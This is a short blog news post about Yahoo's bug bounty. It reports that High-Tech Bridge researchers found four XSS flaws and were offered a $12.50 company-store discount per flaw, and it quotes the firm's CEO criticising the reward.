Yahoo! : Security Research Bug Boutny worth $12.50


There are numbers of Companies like Facebook, Google, Microsoft looking for high security therefore they organise a BUG BOUTNY program and all they were paying more then $100 per Bug.

Yahoo is not having very good run in the reputation department when it comes to user security. Researchers at High-Tech Bridge found a few bugs, and were not exactly impressed with Yahoo’s reward.

Swiss penetration testing firm High-Tech Bridge said it ran a “small experiment” with Yahoo to see how quickly the company reacted to vulnerability notifications.

Ilia Kolochenko, High-Tech Bridge CEO, says: “Paying several dollars per vulnerability is a bad joke and won’t motivate people to report security vulnerabilities to them, especially when such vulnerabilities can be easily sold on the black market for a much higher price. Nevertheless, money is not the only motivation of security researchers.”

 “If Yahoo cannot afford to spend money on its corporate security, it should at least try to attract security researchers by other means. Otherwise, none of Yahoo’s customers can ever feel safe.

The researchers said they found a cross-site scripting (XSS) flaw in a Yahoo web property within 45 minutes. Yahoo’s security team responded within 24 hours, but reportedly did not offer a cash reward, claiming someone else had reported the flaw first.

Unperturbed, High-Tech researchers continued and found three more XSS vulnerabilities.

“Each of the discovered vulnerabilities allowed any @yahoo.com email account to be compromised simply by sending a specially crafted link to a logged-in Yahoo user and making him/her click on it,” the researchers said.

“Yahoo warmly thanked us for reporting the vulnerabilities and offered us… 12.50 USD (twelve dollars and fifty cents) reward per one vulnerability.

“Moreover, this sum was given as a discount code that can only be used in the Yahoo Company Store, which sell Yahoo’s corporate t-shirts, cups, pens and other accessories.

The company noted that Yahoo had since patched all four XSS vulnerabilities.

Advertisements

One thought on “Yahoo! : Security Research Bug Boutny worth $12.50

  1. Pingback: Yahoo Bug Bounty Policy changes: Increases Bug Bounty Reward to $15,000 | Hacking with New Ideas

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s